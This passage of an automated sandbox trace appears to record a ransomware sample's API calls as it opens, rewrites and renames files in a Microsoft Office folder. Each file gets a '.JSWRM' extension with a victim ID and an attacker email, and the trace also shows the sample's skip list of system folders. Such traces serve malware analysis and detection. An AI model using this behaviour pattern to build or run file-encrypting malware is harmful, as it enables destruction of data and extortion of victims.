dwFlags=0x0, lpWideCharStr="ZPDIR36F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR36F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR36F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0120.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0120.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR36F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR36F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR36F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0120.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0120.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0120.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0120.409] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR36F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir36f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.412] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=34654) returned 1 [0120.412] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8750) returned 0x24e1d8 [0120.412] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x8750, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x8750, lpOverlapped=0x0) returned 1 [0120.415] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.415] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x8750, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x8750, lpOverlapped=0x0) returned 1 [0120.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.416] CloseHandle (hObject=0x314) returned 1 [0120.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0120.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0120.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0120.416] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0120.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0120.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0120.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0120.416] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0120.416] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR36F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir36f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR36F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir36f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0120.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0120.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0120.417] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae23ccd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd1ac, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR37F.GIF", cAlternateFileName="")) returned 1 [0120.417] lstrcmpiW (lpString1="ZPDIR37F.GIF", lpString2=".") returned 1 [0120.417] lstrcmpiW (lpString1="ZPDIR37F.GIF", lpString2="..") returned 1 [0120.417] lstrcmpiW (lpString1="ZPDIR37F.GIF", lpString2="...") returned 1 [0120.417] lstrcmpiW (lpString1="ZPDIR37F.GIF", lpString2="windows") returned 1 [0120.417] lstrcmpiW (lpString1="ZPDIR37F.GIF", lpString2="recovery") returned 1 [0120.417] lstrcmpiW (lpString1="ZPDIR37F.GIF", lpString2="perflogs") returned 1 [0120.417] lstrcmpiW (lpString1="ZPDIR37F.GIF", lpString2="documents and settings") returned 1 [0120.417] lstrcmpiW (lpString1="ZPDIR37F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.417] lstrcmpiW (lpString1="ZPDIR37F.GIF", lpString2="system volume information") returned 1 [0120.417] lstrcmpiW (lpString1="ZPDIR37F.GIF", lpString2="msocache") returned 1 [0120.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0120.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR37F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR37F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR37F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0120.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0120.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR37F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR37F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR37F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0120.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0120.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0120.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0120.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR37F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir37f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.419] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=53676) returned 1 [0120.419] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd1a0) returned 0x24e1d8 [0120.419] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xd1a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0xd1a0, lpOverlapped=0x0) returned 1 [0120.424] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.424] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xd1a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0xd1a0, lpOverlapped=0x0) returned 1 [0120.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.424] CloseHandle (hObject=0x314) returned 1 [0120.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0120.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0120.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0120.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0120.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0120.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0120.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0120.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0120.425] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR37F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir37f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR37F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir37f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0120.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0120.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0120.491] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae23ccd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcbc3, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR38F.GIF", cAlternateFileName="")) returned 1 [0120.491] lstrcmpiW (lpString1="ZPDIR38F.GIF", lpString2=".") returned 1 [0120.491] lstrcmpiW (lpString1="ZPDIR38F.GIF", lpString2="..") returned 1 [0120.491] lstrcmpiW (lpString1="ZPDIR38F.GIF", lpString2="...") returned 1 [0120.491] lstrcmpiW (lpString1="ZPDIR38F.GIF", lpString2="windows") returned 1 [0120.491] lstrcmpiW (lpString1="ZPDIR38F.GIF", lpString2="recovery") returned 1 [0120.491] lstrcmpiW (lpString1="ZPDIR38F.GIF", lpString2="perflogs") returned 1 [0120.491] lstrcmpiW (lpString1="ZPDIR38F.GIF", lpString2="documents and settings") returned 1 [0120.491] lstrcmpiW (lpString1="ZPDIR38F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.491] lstrcmpiW (lpString1="ZPDIR38F.GIF", lpString2="system volume information") returned 1 [0120.491] lstrcmpiW (lpString1="ZPDIR38F.GIF", lpString2="msocache") returned 1 [0120.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0120.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR38F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR38F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR38F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0120.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0120.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR38F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR38F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR38F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0120.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0120.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0120.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0120.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR38F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir38f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.493] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=52163) returned 1 [0120.493] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xcbc0) returned 0x24e1d8 [0120.493] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xcbc0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0xcbc0, lpOverlapped=0x0) returned 1 [0120.498] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.499] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xcbc0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0xcbc0, lpOverlapped=0x0) returned 1 [0120.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.499] CloseHandle (hObject=0x314) returned 1 [0120.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0120.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0120.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0120.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0120.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0120.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0120.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.499] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR38F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir38f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR38F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir38f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0120.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0120.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0120.501] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae23ccd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae23ccd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae23ccd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdc9a, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR39F.GIF", cAlternateFileName="")) returned 1 [0120.501] lstrcmpiW (lpString1="ZPDIR39F.GIF", lpString2=".") returned 1 [0120.501] lstrcmpiW (lpString1="ZPDIR39F.GIF", lpString2="..") returned 1 [0120.501] lstrcmpiW (lpString1="ZPDIR39F.GIF", lpString2="...") returned 1 [0120.501] lstrcmpiW (lpString1="ZPDIR39F.GIF", lpString2="windows") returned 1 [0120.501] lstrcmpiW (lpString1="ZPDIR39F.GIF", lpString2="recovery") returned 1 [0120.501] lstrcmpiW (lpString1="ZPDIR39F.GIF", lpString2="perflogs") returned 1 [0120.501] lstrcmpiW (lpString1="ZPDIR39F.GIF", lpString2="documents and settings") returned 1 [0120.501] lstrcmpiW (lpString1="ZPDIR39F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.501] lstrcmpiW (lpString1="ZPDIR39F.GIF", lpString2="system volume information") returned 1 [0120.501] lstrcmpiW (lpString1="ZPDIR39F.GIF", lpString2="msocache") returned 1 [0120.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0120.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR39F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR39F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR39F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0120.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0120.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR39F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR39F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR39F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0120.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0120.501] HeapFree (in: 